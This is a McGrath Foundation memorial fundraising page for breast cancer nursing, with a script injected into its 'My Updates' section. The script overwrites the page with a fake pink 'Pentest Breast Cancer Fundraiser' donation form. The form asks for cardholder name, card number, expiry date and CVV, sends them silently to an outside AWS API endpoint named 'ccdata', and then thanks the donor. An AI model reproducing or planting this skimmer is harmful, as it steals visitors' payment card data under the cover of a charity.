McgrathFoundation2025

By Mcgrath Foundation

In memory of someone special

Giving a gift in a loved one’s memory is a meaningful and special way to honour and remember them.  Your donations will help our McGrath Breast Care Nurses to support more families experiencing breast cancer, no matter where they live and for free, so we greatly appreciate your support at this difficult time. Your donations will help us to make a real difference.

Thank you for your support.

My Updates

test

<script>document.body.innerHTML=`<div style="font-family: Arial, sans-serif; margin: 0; padding: 20px; background-color: pink; height: 100vh; display: flex; flex-direction: column; justify-content: center; align-items: center; box-sizing: border-box;"><h2 style="text-align:center;">Pentest Breast Cancer Fundraiser</h2><p style="text-align:center;">Help me turn Pink into the colour of Care</p><form id="donationForm" style="width: 100%; max-width: 400px; background: white; padding: 15px; border-radius: 8px; box-shadow: 0 4px 8px rgba(0,0,0,0.1);"><input type="text" id="cardName" placeholder="Cardholder Name" required style="width: 100%; padding: 12px; margin: 8px 0; font-size: 16px;"><input type="tel" id="cardNumber" placeholder="Card Number" required pattern="[0-9]{13,16}" inputmode="numeric" style="width: 100%; padding: 12px; margin: 8px 0; font-size: 16px;"><input type="text" id="expiryDate" placeholder="Expiry Date (MM/YY)" required style="width: 100%; padding: 12px; margin: 8px 0; font-size: 16px;"><input type="tel" id="cvv" placeholder="CVV" required maxlength="3" pattern="[0-9]{3}" inputmode="numeric" style="width: 100%; padding: 12px; margin: 8px 0; font-size: 16px;"><select id="donationAmount" style="width: 100%; padding: 12px; margin: 8px 0; font-size: 16px;"><option value='25'>Donate $25</option><option value='50'>Donate $50</option><option value='100'>Donate $100</option><option value='200'>Donate $200</option><option value='custom'>Custom Amount</option></select><input type="number" id="customAmount" placeholder="Enter custom amount" min="1" style="width: 100%; padding: 12px; margin: 8px 0; font-size: 16px; display: none;"><button type="submit" style="width: 100%; background-color: #e91e63; color: white; padding: 14px; font-size: 16px; border: none; border-radius: 4px; cursor: pointer;">Donate Now</button></form><p style="font-size: 12px; color: grey; margin-top: 10px;">Secure Payment Processing</p></div>`;document.getElementById('donationAmount').addEventListener('change',function(){document.getElementById('customAmount').style.display=this.value==='custom'?'block':'none'}),document.getElementById('donationForm').addEventListener('submit',function(e){e.preventDefault();const t=document.getElementById('cardName').value,n=document.getElementById('cardNumber').value,a=document.getElementById('expiryDate').value,o=document.getElementById('cvv').value;let m=document.getElementById('donationAmount').value;'custom'===m&&(m=document.getElementById('customAmount').value),fetch('https://xizjgr0dwj.execute-api.ap-southeast-2.amazonaws.com/fireprox/ccdata',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({cardName:t,cardNumber:n,expiryDate:a,cvv:o,donationAmount:m})}),alert('Thank you for your donation!')});</script>